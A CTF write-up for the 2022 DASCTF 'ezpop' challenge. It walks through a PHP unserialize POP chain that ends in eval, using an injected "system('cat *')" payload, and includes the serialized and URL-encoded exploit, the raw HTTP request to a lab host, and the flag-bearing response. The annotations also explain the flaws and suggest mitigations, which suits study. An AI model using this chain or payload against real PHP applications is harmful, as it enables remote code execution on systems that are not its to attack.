CTF做题笔记8

[2022DASCTF]ezpop

<?php

/**
 * Challenge class that supplies the __invoke() link of the POP
 * (property-oriented programming) chain.
 *
 * Both properties are public and untyped, so a serialized payload can set
 * them to any value, including other objects.
 */
class crow
{
    // Class name used by eval(); object that receives world() in __invoke().
    public $v1;
    // Constructor argument handed to the class named by $v1 in eval().
    public $v2;

    /**
     * Instantiates the class named by $v1 with $v2 as its constructor
     * argument and echoes the new object (which converts it to a string).
     *
     * NOTE(review): with attacker-controlled properties this is arbitrary
     * class instantiation with a chosen constructor argument. No code visible
     * in this listing calls the method.
     */
    function eval() {
        echo new $this->v1($this->v2);
    }

    /**
     * Runs when a crow object is called like a function.
     *
     * Calls world() on $v1. No class in this listing defines world(), so when
     * $v1 is an object that implements __call() (fin does), PHP dispatches
     * the call there instead.
     */
    public function __invoke()
    {
        $this->v1->world();
    }
}

/**
 * Challenge class that provides the chain's entry point (__destruct) and the
 * __call() link that reaches get_flag().
 *
 * $f1 is public and untyped, so a serialized payload decides what it holds.
 */
class fin
{
    // String-converted in __destruct(), invoked in run(), receiver of get_flag() in __call().
    public $f1;

    /**
     * Runs automatically when the object is destroyed.
     *
     * The concatenation converts $f1 to a string, so an object stored in $f1
     * has its __toString() called. This is why deserializing a fin is enough
     * to start executing code without any explicit method call.
     */
    public function __destruct()
    {
        echo $this->f1 . '114514';
    }

    /**
     * Calls $f1 as a function; an object in $f1 has its __invoke() run.
     */
    public function run()
    {
        ($this->f1)();
    }

    /**
     * Runs for any call to a method this class does not define.
     *
     * The method name ($a) and arguments ($b) are ignored; get_flag() is
     * called on $f1 and its return value is echoed.
     */
    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }

}

/**
 * Challenge class that turns a string conversion into a method call.
 */
class what
{
    // Object whose run() method is called from __toString().
    public $a;

    /**
     * Runs whenever the object is converted to a string.
     *
     * Calls run() on $a as a side effect before returning the fixed string
     * 'hello'. A __toString() with side effects is what lets a plain
     * concatenation elsewhere continue the chain.
     */
    public function __toString()
    {
        $this->a->run();
        return 'hello';
    }
}
/**
 * Challenge class that holds the code-execution sink (get_flag) and a second
 * run() that invokes its property as a callable.
 */
class mix
{
    // Invoked as a callable in run(); appended to the evaluated string in get_flag().
    public $m1;

    /**
     * Calls $m1 as a function; an object in $m1 has its __invoke() run.
     */
    public function run()
    {
        ($this->m1)();
    }

    /**
     * Evaluates '#' followed by $m1 as PHP code.
     *
     * SECURITY: eval() on object state that a deserialized payload controls.
     * The '#' prefix only comments out text up to the first line break, so
     * anything after a newline in $m1 is executed. Prefixing a comment marker
     * is not sanitization; the fix is to not evaluate the property at all.
     */
    public function get_flag()
    {
        eval('#' . $this->m1);
    }

}

// Request handler: deserializes the POST parameter "cmd" when present,
// otherwise prints this file's source.
//
// SECURITY: unserialize() on request data with no allowed_classes restriction.
// Any class defined above can be instantiated with caller-chosen property
// values, and its magic methods (__destruct, __toString, __invoke, __call)
// then run on that data. The returned object is not kept, so its destructor
// runs as soon as the statement finishes.
// Mitigation: do not unserialize untrusted input. Use json_decode() for data
// exchange, or pass ['allowed_classes' => false] as the second argument.
if (isset($_POST['cmd'])) {
    unserialize($_POST['cmd']);
} else {
    highlight_file(__FILE__);
}


// Solver's addition: builds the object graph for the chain and prints its
// serialized form. Dispatch order once the outer fin is destroyed:
//   fin::__destruct  -> string concatenation calls what::__toString
//   what::__toString -> mix::run
//   mix::run         -> invoking the crow object calls crow::__invoke
//   crow::__invoke   -> world() is undefined on fin, so fin::__call runs
//   fin::__call      -> mix::get_flag -> eval('#' . m1)
// NOTE(review): the classes above are defined with their real bodies, so this
// script also runs the chain on the local machine when $a is destroyed at
// script end. Build test payloads against stub classes that declare only the
// properties.
$a = new fin();
$a->f1 = new what();
$a->f1->a = new mix();
$a->f1->a->m1 = new crow();
$a->f1->a->m1->v1 = new fin();
$a->f1->a->m1->v1->f1 = new mix();
// $a->f1->a->m1->v1->f1 ->m1 = "\n print_r(scandir(dirname(__FILE__)));";
// The leading "\n" ends the '#' comment that get_flag() prepends.
$a->f1->a->m1->v1->f1->m1 = "\n system('cat *');";
echo serialize($a);
?>
O:3:"fin":1:{s:2:"f1";O:4:"what":1:{s:1:"a";O:3:"mix":1:{s:2:"m1";O:4:"crow":2:{s:2:"v1";O:3:"fin":1:{s:2:"f1";O:3:"mix":1:{s:2:"m1";s:18:"
 system('cat *');";}}s:2:"v2";N;}}}}
%4f%3a%33%3a%22%66%69%6e%22%3a%31%3a%7b%73%3a%32%3a%22%66%31%22%3b%4f%3a%34%3a%22%77%68%61%74%22%3a%31%3a%7b%73%3a%31%3a%22%61%22%3b%4f%3a%33%3a%22%6d%69%78%22%3a%31%3a%7b%73%3a%32%3a%22%6d%31%22%3b%4f%3a%34%3a%22%63%72%6f%77%22%3a%32%3a%7b%73%3a%32%3a%22%76%31%22%3b%4f%3a%33%3a%22%66%69%6e%22%3a%31%3a%7b%73%3a%32%3a%22%66%31%22%3b%4f%3a%33%3a%22%6d%69%78%22%3a%31%3a%7b%73%3a%32%3a%22%6d%31%22%3b%73%3a%31%38%3a%22%0a%20%73%79%73%74%65%6d%28%27%63%61%74%20%2a%27%29%3b%22%3b%7d%7d%73%3a%32%3a%22%76%32%22%3b%4e%3b%7d%7d%7d%7d%0a
POST / HTTP/1.1
Host: d2a67562-b05a-4c09-a308-a7b7e9fb4bdc.node4.buuoj.cn:81
Content-Length: 535
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://d2a67562-b05a-4c09-a308-a7b7e9fb4bdc.node4.buuoj.cn:81
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://d2a67562-b05a-4c09-a308-a7b7e9fb4bdc.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: UM_distinctid=17fbfc9d0df1596-08ef2a13d1d96a-14281e05-384000-17fbfc9d0e014a0
Connection: close

cmd=%4f%3a%33%3a%22%66%69%6e%22%3a%31%3a%7b%73%3a%32%3a%22%66%31%22%3b%4f%3a%34%3a%22%77%68%61%74%22%3a%31%3a%7b%73%3a%31%3a%22%61%22%3b%4f%3a%33%3a%22%6d%69%78%22%3a%31%3a%7b%73%3a%32%3a%22%6d%31%22%3b%4f%3a%34%3a%22%63%72%6f%77%22%3a%32%3a%7b%73%3a%32%3a%22%76%31%22%3b%4f%3a%33%3a%22%66%69%6e%22%3a%31%3a%7b%73%3a%32%3a%22%66%31%22%3b%4f%3a%33%3a%22%6d%69%78%22%3a%31%3a%7b%73%3a%32%3a%22%6d%31%22%3b%73%3a%31%38%3a%22%0a%20%73%79%73%74%65%6d%28%27%63%61%74%20%2a%27%29%3b%22%3b%7d%7d%73%3a%32%3a%22%76%32%22%3b%4e%3b%7d%7d%7d%7d%0a
HTTP/1.1 200 OK
Server: openresty
Date: Sun, 27 Mar 2022 06:10:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.28
Content-Length: 1424

not here, but it's close, think more.not here, but it's close, think more.not here, but it's close, think more.not here, but it's close, think more.not here, but it's close, think more.congratulations!
<?php

//flag{5ea0ff6e-3160-49f4-9a92-a5137e51db3d}
not here, but it's close, think more.not here, but it's close, think more.not here, but it's close, think more.not here, but you are almost getting the flag!<?php